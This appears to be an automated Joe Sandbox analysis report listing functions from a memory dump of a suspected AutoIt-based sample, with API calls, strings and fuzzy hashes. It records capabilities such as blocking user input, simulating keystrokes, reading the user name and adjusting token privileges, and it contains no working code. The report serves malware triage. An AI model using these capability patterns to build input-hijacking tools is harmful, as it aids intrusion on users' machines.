Opcode Fuzzy Hash: 061dd2ada2bc9554a4aa39f8acc05a4c1d6796e6c2587092ee219bfe589f7e53
Instruction Fuzzy Hash: B811BFB2400304BFD718AF94EC86E6BB7B8FB05711B20851EE44697291DB70BC86CB64

Function 00A15058 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,00A1502E,?,00AB98D8,0000000C,00A15185,?,00000002,00000000), ref: 00A15079
TerminateProcess.KERNEL32(00000000,?,00A1502E,?,00AB98D8,0000000C,00A15185,?,00000002,00000000), ref: 00A15080
ExitProcess.KERNEL32 ref: 00A15092

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: f1768bf0e013ee2d04fe3c1a8f9143cabcaf787ed9c3a8bb8c89b00fb9a7ab0a
Instruction ID: 7940f66e82331c40e89c37f000b9e16081ef49ac1749f760abd66e8958cf440b
Opcode Fuzzy Hash: f1768bf0e013ee2d04fe3c1a8f9143cabcaf787ed9c3a8bb8c89b00fb9a7ab0a
Instruction Fuzzy Hash: B6E0B632800658EFCF21BFA4DE09E983B69EF95381F114414F8499A561DB35DD82CBC0

Function 00A4E652 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 00A4E664

Strings

X64, xrefs: 00A4E680

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: 48da1d58ab1eff9e231793333d2dade37e66f849775363b860d8cbc32269fb65
Instruction ID: 6e8e8f6441fe63c21623ff5c7c4fed4292957d5befa30005c0f1bb0b8068242d
Opcode Fuzzy Hash: 48da1d58ab1eff9e231793333d2dade37e66f849775363b860d8cbc32269fb65
Instruction Fuzzy Hash: 08D0C9B480511DEACB80CB90EC88DD9B37CBB04304F100A51F106E2040D73195499B20

Function 00A641FA Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00A752EE,?,?,00000035,?), ref: 00A64229
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00A752EE,?,?,00000035,?), ref: 00A64239

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: ae946531661d3a8abfc62d0473ba7d170ae74188ea39172440847f0bdb51478b
Instruction ID: 77324e68f845e7214fddd9c86860cd4e873da9d192f41d02d3a435974bdf2ea9
Opcode Fuzzy Hash: ae946531661d3a8abfc62d0473ba7d170ae74188ea39172440847f0bdb51478b
Instruction Fuzzy Hash: E0F0A0706003286AE72056A5AC4DFEB377DEFC9761F100165B505D2185DA70990087B0

Function 00A5BBED Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00A5BC24
keybd_event.USER32(?,753DC0D0,?,00000000), ref: 00A5BC37

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: 05ea07215bc4d8bbb8eb85c0c03fc46b044f69c68c7dc3ccf7b65672e2e98496
Instruction ID: 112649f6096812d764fc10d27636b4182eecf62ca2c3b31d2d24756bc90ad6dd
Opcode Fuzzy Hash: 05ea07215bc4d8bbb8eb85c0c03fc46b044f69c68c7dc3ccf7b65672e2e98496
Instruction Fuzzy Hash: 5EF06D7080024DABDB05DFA0C806BBEBBB0FF0830AF00840AF951A5191C3798205DFA4

Function 00A51A0B Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00A51B48), ref: 00A51A20
CloseHandle.KERNEL32(?,?,00A51B48), ref: 00A51A35

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: ef8cb37ef0180c45ec3669e8e3f8979bca59c981137c473d221facaaa6e3332c
Instruction ID: a2192547a3864e284778feea59eb3403cb7b6d084a77ddd856d2876087fd5793
Opcode Fuzzy Hash: ef8cb37ef0180c45ec3669e8e3f8979bca59c981137c473d221facaaa6e3332c
Instruction Fuzzy Hash: 56E09A72014610BEE7256B50FC05FB6B7A9EB04361F24891EB596844B0DBA26CD1DB54

Function 00A6F4FF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 00A6F51A

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: e8c88a68a95ed1dddfd3703601bcb264e128f94716d0fe555d9e3d5de7c7884a
Instruction ID: 0541e0e1d651b0b8b608946798db4b364d2308f1deee27dd49a9e068bd962777
Opcode Fuzzy Hash: e8c88a68a95ed1dddfd3703601bcb264e128f94716d0fe555d9e3d5de7c7884a
Instruction Fuzzy Hash: AAE048312102095FC710EF69E404A56F7E8AFA4771F008425F94BD7351D670FD458B91

Function 00A5EC9E Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00A5ECC7

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: 4b609f82a0d27c1eb22c585bb730e64540d25d4aa5b010a287e86a0c886427ae
Instruction ID: d3e65bf907b4b0dd880ff4ba60614d10c11f305db83a8145877852cdd192946b
Opcode Fuzzy Hash: 4b609f82a0d27c1eb22c585bb730e64540d25d4aa5b010a287e86a0c886427ae
Instruction Fuzzy Hash: 7CD017B619420128E81D8B398E2FB76360DB701743FC80649BA02C9AD9E5F5DB08A061

Function 00A10D45 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,00A1075E), ref: 00A10D4A

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 2c8ec54c2921e86ae294525aad7c4520713e0c0573596b9f738d03f2c2c6942f
Instruction ID: 0d78d7657b0a96548ebf0aa4bf5aa98dbe1835b39e96b4600453e647dbd34f19
Opcode Fuzzy Hash: 2c8ec54c2921e86ae294525aad7c4520713e0c0573596b9f738d03f2c2c6942f
Instruction Fuzzy Hash:

Function 00A7353B Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00A7358D
DeleteObject.GDI32(00000000), ref: 00A735A0
DestroyWindow.USER32 ref: 00A735AF
GetDesktopWindow.USER32 ref: 00A735CA
GetWindowRect.USER32(00000000), ref: 00A735D1
SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00A73700
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00A7370E
CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A73755
GetClientRect.USER32(00000000,?), ref: 00A73761
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00A7379D
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A737BF
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A737D2
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A737DD
GlobalLock.KERNEL32(00000000), ref: 00A737E6
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A737F5
GlobalUnlock.KERNEL32(00000000), ref: 00A737FE
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A73805
GlobalFree.KERNEL32(00000000), ref: 00A73810
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A73822
OleLoadPicture.OLEAUT32(?,00000000,00000000,00A90C04,00000000), ref: 00A73838
GlobalFree.KERNEL32(00000000), ref: 00A73848
CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00A7386E
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00A7388D
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A738AF
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A73A9C

Strings

DISPLAY, xrefs: 00A738FF
, xrefs: 00A73A22
AutoIt v3, xrefs: 00A7374F
static, xrefs: 00A73797, 00A738EE

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 6e9894ddeae5c915001c5ecad19f02aaebb9bfddd78527dcb1ee6e1f29675939
Instruction ID: 6ac3b7c3ce5da4fc10dd09974b697de181491ff9ac2debeefa0a2bf89292b56a
Opcode Fuzzy Hash: 6e9894ddeae5c915001c5ecad19f02aaebb9bfddd78527dcb1ee6e1f29675939
Instruction Fuzzy Hash: A2026072500209AFDB14DFA4CD89EAE7BB9FF48310F058558F919AB2A0DB74ED41CB60

Function 00A87B0D Relevance: 49.8, APIs: 33, Instructions: 273COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 00A87B67
GetSysColorBrush.USER32(0000000F), ref: 00A87B98
GetSysColor.USER32(0000000F), ref: 00A87BA4
SetBkColor.GDI32(?,000000FF), ref: 00A87BBE
SelectObject.GDI32(?,?), ref: 00A87BCD
InflateRect.USER32(?,000000FF,000000FF), ref: 00A87BF8
GetSysColor.USER32(00000010), ref: 00A87C00
CreateSolidBrush.GDI32(00000000), ref: 00A87C07
FrameRect.USER32(?,?,00000000), ref: 00A87C16
DeleteObject.GDI32(00000000), ref: 00A87C1D
InflateRect.USER32(?,000000FE,000000FE), ref: 00A87C68
FillRect.USER32(?,?,?), ref: 00A87C9A
GetWindowLongW.USER32(?,000000F0), ref: 00A87CBC

Part of subcall function 00A87E22: GetSysColor.USER32(00000012), ref: 00A87E5B
Part of subcall function 00A87E22: SetTextColor.GDI32(?,00A87B2D), ref: 00A87E5F
Part of subcall function 00A87E22: GetSysColorBrush.USER32(0000000F), ref: 00A87E75
Part of subcall function 00A87E22: GetSysColor.USER32(0000000F), ref: 00A87E80
Part of subcall function 00A87E22: GetSysColor.USER32(00000011), ref: 00A87E9D
Part of subcall function 00A87E22: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00A87EAB
Part of subcall function 00A87E22: SelectObject.GDI32(?,00000000), ref: 00A87EBC
Part of subcall function 00A87E22: SetBkColor.GDI32(?,?), ref: 00A87EC5
Part of subcall function 00A87E22: SelectObject.GDI32(?,?), ref: 00A87ED2
Part of subcall function 00A87E22: InflateRect.USER32(?,000000FF,000000FF), ref: 00A87EF1
Part of subcall function 00A87E22: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00A87F08
Part of subcall function 00A87E22: GetWindowLongW.USER32(?,000000F0), ref: 00A87F15

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: 3c509f6580eff126c3609f7c6270f903c95bf8b0bbb935968a667449add5c711
Instruction ID: 8e204c49daa22016b100555a8016f9867857abcdfe2b05efba298062d651d733
Opcode Fuzzy Hash: 3c509f6580eff126c3609f7c6270f903c95bf8b0bbb935968a667449add5c711
Instruction Fuzzy Hash: CDA15C72008301AFDB15EFA4DC48E6FBBA9FF48325F200A19F9A2961E0D775D946CB51

Function 009F1625 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 009F16B4
SendMessageW.USER32(?,00001308,?,00000000), ref: 00A32B07
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00A32B40
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00A32F85

Part of subcall function 009F1802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,009F1488,?,00000000,?,?,?,?,009F145A,00000000,?), ref: 009F1865

SendMessageW.USER32(?,00001053), ref: 00A32FC1
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00A32FD8
ImageList_Destroy.COMCTL32(00000000,?), ref: 00A32FEE
ImageList_Destroy.COMCTL32(00000000,?), ref: 00A32FF9

Strings

0, xrefs: 00A32E11

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
String ID: 0
API String ID: 2760611726-4108050209
Opcode ID: 2511a5919ead647ba26ac2ea4140425bb8646d9d718bcb5c6216cefa5eba9337
Instruction ID: 257ef682fcb5b2d16b469996fa8862070146d4bafcec6cf5a3cfe46fa4b517c2
Opcode Fuzzy Hash: 2511a5919ead647ba26ac2ea4140425bb8646d9d718bcb5c6216cefa5eba9337
Instruction Fuzzy Hash: F612B830204205EFDB29DF54C884BBABBE5FB44304F288569F599DB2A1C731EC82DB91

Function 00A7316E Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 00A7319B
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00A732C7
SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00A73306
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00A73316
CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00A7335D
GetClientRect.USER32(00000000,?), ref: 00A73369
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00A733B2
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00A733C1
GetStockObject.GDI32(00000011), ref: 00A733D1
SelectObject.GDI32(00000000,00000000), ref: 00A733D5
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00A733E5
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A733EE
DeleteDC.GDI32(00000000), ref: 00A733F7
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00A73423
SendMessageW.USER32(00000030,00000000,00000001), ref: 00A7343A
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00A7347A
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00A7348E
SendMessageW.USER32(00000404,00000001,00000000), ref: 00A7349F
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00A734D4
GetStockObject.GDI32(00000011), ref: 00A734DF
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00A734EA
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00A734F4

Strings

DISPLAY, xrefs: 00A733B7
msctls_progress32, xrefs: 00A73470
AutoIt v3, xrefs: 00A73355
static, xrefs: 00A733AC, 00A734CE

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 8639d2be8637a9f96e9d108789a2ccf3c310b2bcad6f2879c49f400dec160177
Instruction ID: 32fad9fff0d98a972c70978f16f6b1179071769839dee87966e229828616b98a
Opcode Fuzzy Hash: 8639d2be8637a9f96e9d108789a2ccf3c310b2bcad6f2879c49f400dec160177
Instruction Fuzzy Hash: 40B14DB1A00209AFEB14DFA8CD49FAE7BB9EB48710F018114FA15EB2D1D774AD41CB90

Function 00A65524 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00A65532
GetDriveTypeW.KERNEL32(?,00A8DC30,?,\\.\,00A8DCD0), ref: 00A6560F
SetErrorMode.KERNEL32(00000000,00A8DC30,?,\\.\,00A8DCD0), ref: 00A6577B

Strings

MMC, xrefs: 00A65723
RAID, xrefs: 00A65700
ATAPI, xrefs: 00A656D6
SAS, xrefs: 00A6570E
iSCSI, xrefs: 00A65707
SCSI, xrefs: 00A656CF
Unknown, xrefs: 00A65632, 00A656C8
SSA, xrefs: 00A656EB
1394, xrefs: 00A656E4
Removable, xrefs: 00A65655, 00A6565A
PhysicalDrive, xrefs: 00A655BB
Fixed, xrefs: 00A6564E
FileBackedVirtual, xrefs: 00A65731
Virtual, xrefs: 00A6572A
RAMDisk, xrefs: 00A65639
SATA, xrefs: 00A65715
USB, xrefs: 00A656F9
CDROM, xrefs: 00A65640
Network, xrefs: 00A65647
SSD, xrefs: 00A6568F
Fibre, xrefs: 00A656F2
\\.\, xrefs: 00A65584
ATA, xrefs: 00A656DD

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: a6709fd5c514ca70c42f7088916725358e54cc9e17f578bea3e64d8de3ebf872
Instruction ID: 5d2e0435badba46c97f4eeb3d912b599ce345d365af0b3e2119eb5a79dd1b549
Opcode Fuzzy Hash: a6709fd5c514ca70c42f7088916725358e54cc9e17f578bea3e64d8de3ebf872
Instruction Fuzzy Hash: BB61CF34E08A09EFC724DF34CA919BC77B5BF94390F248815E406AB292D7B1DE42CB51

Function 00A81A8F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00A81BC4
GetDesktopWindow.USER32 ref: 00A81BD9
GetWindowRect.USER32(00000000), ref: 00A81BE0
GetWindowLongW.USER32(?,000000F0), ref: 00A81C35
DestroyWindow.USER32(?), ref: 00A81C55
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00A81C89
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A81CA7
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00A81CB9
SendMessageW.USER32(00000000,00000421,?,?), ref: 00A81CCE
SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00A81CE1
IsWindowVisible.USER32(00000000), ref: 00A81D3D
SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00A81D58
SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00A81D6C
GetWindowRect.USER32(00000000,?), ref: 00A81D84
MonitorFromPoint.USER32(?,?,00000002), ref: 00A81DAA
GetMonitorInfoW.USER32(00000000,?), ref: 00A81DC4
CopyRect.USER32(?,?), ref: 00A81DDB
SendMessageW.USER32(00000000,00000412,00000000), ref: 00A81E46

Strings

tooltips_class32, xrefs: 00A81C82
0, xrefs: 00A81B6F
(, xrefs: 00A81DB7

Memory Dump Source

